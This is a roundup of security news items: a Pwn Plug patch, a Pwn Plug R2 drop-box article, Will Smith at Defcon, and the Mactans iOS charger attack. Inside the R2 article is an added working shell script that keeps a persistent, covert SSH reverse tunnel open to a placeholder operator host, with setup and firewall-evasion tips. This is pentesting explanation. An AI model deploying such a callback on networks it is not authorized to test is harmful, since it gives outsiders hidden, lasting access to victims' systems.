Pwn Plug / Power Pwn updated to 1.1.3

We’re back from Vegas in (mostly) full force, and wanted to let you know we’ve released an update for the Pwn Plug and Power Pwn, 1.1.3:

  • Fixes the security issue originally reported by Wesley McGrew at Defcon 21: the PlugUI did not properly sanitize data received from the network. This release adds the missing sanitization.
  • Fixes the updating of the Metasploit framework to pull directly from Pwnie Express.

You can find details on how to obtain the patch from the downloads page.

Pwn Probe Runs Sneaky New Linux Distro

By Eric Brown

Pwnie Express has opened pre-orders on a Linux-based penetration testing device that supports 4G out-of-band SSH access. The Pwn Plug R2 runs the Kali Linux-based Pwnix distribution on a 1.2GHz Marvell Armada 370 SoC, and offers dual gigabit Ethernet ports, high-gain WiFi and Bluetooth, and a variety of one-click pen-testing tricks, like running the device as an Evil AP.

Pwnie Express sells a number of devices for penetration testing — probing an organization’s security capabilities with a covert snooping device that simulates attacks. The new Pwn Plug R2 is larger, but $100 cheaper than the $995 Pwn Plug Elite. It also adds a second gigabit Ethernet port and a second USB port, as well as an eight-inch antenna.

The Pwn Plug R2 also runs a new version of Linux. Instead of the previous Debian build, it uses a new Pwnix distribution based on Offensive Security’s Debian-derived pen-testing Kali Linux. According to an Ars Technica interview with Dave Porcello, CEO of Pwnie Express, at the Black Hat security conference in Las Vegas, Kali Linux is a dramatic improvement over Offensive Security’s previous BackTrack Linux pen-testing distro.

The 5.2 x 3.7 x 0.8-inch Pwn Plug R2 is designed as a “drop box” device: it can be sent through the mail, installed quickly and unobtrusively by a novice, and then operated remotely by a security professional. The device supports pen-testing features such as automated bypass of NAC (network access control), 802.1X port authentication, and Cisco RADIUS deployments, and it can tunnel out through firewalls. “One-click” techniques include establishing the device as an “Evil AP,” enabling stealth mode, and passive recon monitoring. In stealth mode the device is claimed to be “unpingable” and to expose no listening ports.

The Pwn Plug R2 runs Pwnix on a Marvell Armada 370, a homegrown ARMv7 SoC design clocked to 1.2GHz that falls between the 1GHz Armada 300 and the 1GHz Cortex-A9-based, dual-core Armada 375. The device ships with 1GB of DDR3 RAM and a 32GB microSD card, and is further equipped with dual gigabit Ethernet ports, dual USB 2.0 ports, and a serial console.

The WiFi and Bluetooth radios are said to be “high gain,” and both seem to make use of the supplied eight-inch antenna. No range claims were provided for WiFi, but the Bluetooth radio can reach a whopping 1,000 feet. According to the Ars Technica story, the Bluetooth adapter can even listen in on mobile Bluetooth communication at distances of up to 3,000 feet if customers add an optional 12-inch 9dBi omnidirectional antenna.

The device also offers an unlocked SIM slot supporting 4G/GSM cards from AT&T, T-Mobile, Vodafone, Orange, and GSM carriers in over 160 countries, according to Pwnie Express. The cellular link is used for out-of-band SSH access, so the operator’s connection to the box does not have to traverse the target’s own network.

Optional support is provided for other wireless technologies including ZigBee/Z-Wave, RFID, and software-defined radios. According to Ars Technica, a modified version of the open source HackRF SDR device is available as an add-on, although it does not appear in the datasheet.

Specifications listed for the Pwn Plug R2 include:

  • Processor — 1.2GHz Armada 370 (ARMv7)
  • Memory — 1GB DDR3
  • Memory expansion — microSD slot with 32GB card
  • Wireless:
    • 4G/GSM adapter for AT&T, T-Mobile, Vodafone, Orange, and other GSM carriers
    • High-gain 802.11b/g/n
    • 8-inch external antenna
    • External high-gain Bluetooth adapter with 1000-foot range
    • Packet injection & monitor mode for WiFi and Bluetooth
    • Optional ZigBee/Z-Wave, RFID, and Software-Defined Radio (SDR)
  • Networking — 2x gigabit Ethernet
  • Other I/O — 2x USB 3.0; serial console
  • Firmware/security features:
    • Automated NAC/802.1x/RADIUS bypass
    • Simple web-based administration with “Pwnix UI”
    • One-click Evil AP, stealth mode, & passive recon
    • Out-of-band SSH access over 4G/GSM cell networks
    • Maintains persistent, covert, encrypted SSH access to target network
    • Tunnels through application-aware firewalls & IPS
    • “Unpingable” stealth mode with no listening ports
    • Supports HTTP proxies, SSH-VPN, & OpenVPN
    • OSS-based pentesting toolkit with Metasploit, SET, Kismet, Aircrack-NG, SSLstrip, nmap, Hydra, w3af, Scapy, Ettercap, Bluetooth/VoIP/IPv6 tools, etc.
  • Power — 110-240V (adapters available); consumption 5W idle, 15W max.
  • Dimensions — 5.2 x 3.7 x 0.8 inches
  • Operating system — Pwnix Linux (custom version of Debian-based Kali Linux)
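
The “out-of-band SSH access,” “persistent, covert, encrypted SSH access” and “no listening ports” items above describe one mechanism: the device dials out to a host the operator controls (over the cell link, or over the target’s own egress when that is what is available) and asks that host to listen on a loopback port that is forwarded back to the device’s sshd. The script below is an added example of such a callback written for this page; it is not Pwnix’s code, and the page does not show how Pwnix implements the feature. The operator host c2.example.net, the user callback, the key and known_hosts paths, and the port numbers are all hypothetical.

```shell
#!/bin/sh
# Added example for this page, not Pwnix code: a drop-box style SSH callback.
# The device dials OUT to an operator-controlled host and asks that host to
# listen on a loopback port which is forwarded back to the device's own sshd.
# Nothing on the device listens on the target network; the operator reaches
# the box through the tunnel from the operator host.
#
# Hypothetical values (override via environment): operator host, user, key,
# pinned known_hosts file and ports.
OPERATOR_HOST="${OPERATOR_HOST:-c2.example.net}"
OPERATOR_USER="${OPERATOR_USER:-callback}"
OPERATOR_PORT="${OPERATOR_PORT:-443}"      # outbound 443 is allowed by most egress policies
CALLBACK_KEY="${CALLBACK_KEY:-/etc/dropbox/callback_key}"
KNOWN_HOSTS="${KNOWN_HOSTS:-/etc/dropbox/known_hosts}"  # operator host key, pre-seeded
REMOTE_LISTEN="${REMOTE_LISTEN:-2222}"     # loopback port the operator host will bind
LOCAL_SSHD="${LOCAL_SSHD:-22}"             # device sshd, bound to 127.0.0.1 only

# Print the ssh argument list one item per line so it can be reviewed (and
# tested) without connecting. Paths must not contain whitespace.
#   BatchMode             never prompt; a headless box must fail fast, not hang
#   StrictHostKeyChecking + pinned known_hosts: a MITM on the egress path
#                         cannot impersonate the operator host and own the tunnel
#   ExitOnForwardFailure  if the remote port cannot be bound, exit so the retry
#                         loop does not keep a useless connection open
#   ServerAlive*          detect a dead cell link within ~90 s and redial
#   -R 127.0.0.1:...      bind loopback on the operator host only; the device
#                         is never exposed to the operator host's network
tunnel_args() {
    printf '%s\n' \
        -N \
        -i "$CALLBACK_KEY" \
        -p "$OPERATOR_PORT" \
        -o BatchMode=yes \
        -o StrictHostKeyChecking=yes \
        -o UserKnownHostsFile="$KNOWN_HOSTS" \
        -o ExitOnForwardFailure=yes \
        -o ServerAliveInterval=30 \
        -o ServerAliveCountMax=3 \
        -R "127.0.0.1:${REMOTE_LISTEN}:127.0.0.1:${LOCAL_SSHD}" \
        "${OPERATOR_USER}@${OPERATOR_HOST}"
}

# Persistence: ssh exits when the link dies (keepalives), when the remote port
# cannot be bound, or when the operator kills it; back off and redial.
run_tunnel() {
    delay=5
    while :; do
        # shellcheck disable=SC2046  (intentional word splitting of tunnel_args)
        ssh $(tunnel_args)
        sleep "$delay"
        if [ "$delay" -lt 300 ]; then delay=$((delay * 2)); fi
    done
}

# Only dial out when explicitly asked, so sourcing or linting the script is safe.
if [ "${1:-}" = "start" ]; then run_tunnel; fi
```

Run it as `sh callback.sh start` from init or a cron `@reboot` entry on the device. From the operator host, `ssh -p 2222 user@127.0.0.1` then lands on the device’s sshd. To honour the “no listening ports” claim, bind the device’s sshd to loopback (`ListenAddress 127.0.0.1` in sshd_config) and verify with `ss -tlnp` that nothing listens on the Ethernet or WiFi addresses; the only thing visible from the target side is one outbound ESTABLISHED connection. On the operator host, limit what the callback key can do in authorized_keys, for example `restrict,port-forwarding,permitlisten="127.0.0.1:2222",command="/bin/false"` (permitlisten needs OpenSSH 7.8 or later), so a key recovered from a seized device is good for nothing but re-opening that one forward. Dialling port 443 passes simple port-based egress filters, but a protocol-aware firewall or IPS can still recognise SSH rather than TLS on that port, which is why the datasheet also lists HTTP-proxy and OpenVPN transports.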

(Original Article)

Will Smith Makes Unexpected Appearance at Defcon Hacker Conference

By Lucian Constantin

Actor Will Smith captured the attention of Defcon attendees when he showed up unexpectedly at the hacker conference on Sunday, apparently to do research for an upcoming movie.

The actor attended a talk that featured Apollo Robbins, a renowned sleight-of-hand artist, security consultant and entertainer, who is best known for picking the pockets of Secret Service agents during an encounter with U.S. President Jimmy Carter.

Smith came at the invitation of Robbins, who is coaching him for an upcoming movie, said Chris Hadnagy, the CEO of social engineering consultancy and training firm Social-Engineer and organizer of the Defcon social engineering contest.

According to Hadnagy, Smith was brought in through a back door so he could sit in and hear the talk that he, Robbins and Michele Fincher, another Social-Engineer representative, gave.

The talk included a demonstration of Robbins’ skills, as he called an attendee to the stage and stole his watch, wallet and mobile phone in front of the crowd.

Smith was so impressed with Defcon that he decided to walk around, Hadnagy said. “We went to the vendor area and showed him lock picks, RFID (radio-frequency identification) stuff, Pwnie Express [hacking equipment]—he was thoroughly impressed.”

Smith then visited the Social Engineering Capture the Flag contest room where he greeted some people, gave some autographs and took some pictures, Hadnagy said.

“We showed him some things we did for our [social engineering] class,” Hadnagy said. “He was very interested in how profiling people is done and social engineering. He wanted to understand the human part of hacking.”

Smith had to leave after 20 minutes, otherwise he risked getting mobbed, Defcon founder Jeff Moss said.

There were about 15,000 attendees at Defcon this year, according to the organizers.

It’s not clear if Smith was at the conference doing research for a role in an upcoming movie or for a movie that he plans to produce.

Smith didn’t share the name of the movie, but said that it’s likely that it will be made, Moss said.

Some pictures of Smith at the conference accompanied by Jeff Moss were posted by attendees on Twitter.

(Original Article)


[Photo: Pwnie Express Founder Dave Porcello & Will Smith]

Wolf in Sheep’s Clothing at Black Hat: Getting Pwn’d by Innocent Looking Devices

By Darlene Storm

A trio of researchers presented “Mactans: Injecting Malware into iOS Devices via Malicious Chargers” at Black Hat, demonstrating that an “iOS device can be compromised within one minute” of being plugged into a maliciously crafted charger. Until Apple patches the vulnerability that enables the exploit, every iPhone and iPad user is exposed, since the device does not need to be jailbroken for the attack to work. The attack takes advantage of an iOS flaw that allows a USB host to pair with the device without any notification to the user.

Their proof-of-concept charger, dubbed Mactans, was built on a $45 BeagleBoard. As soon as an iOS device is plugged in, the fake charger captures the device’s Unique Device Identifier (UDID). It then connects to Apple’s developer support website and submits that UDID to obtain a “provisioning profile,” which lets the charger install its code on that specific device; at that point the attacker has full control. GTISC associate director Paul Royal said, “Getting the UDID is trivial, and getting a provisioning profile is easy and automated.”

(Original Article)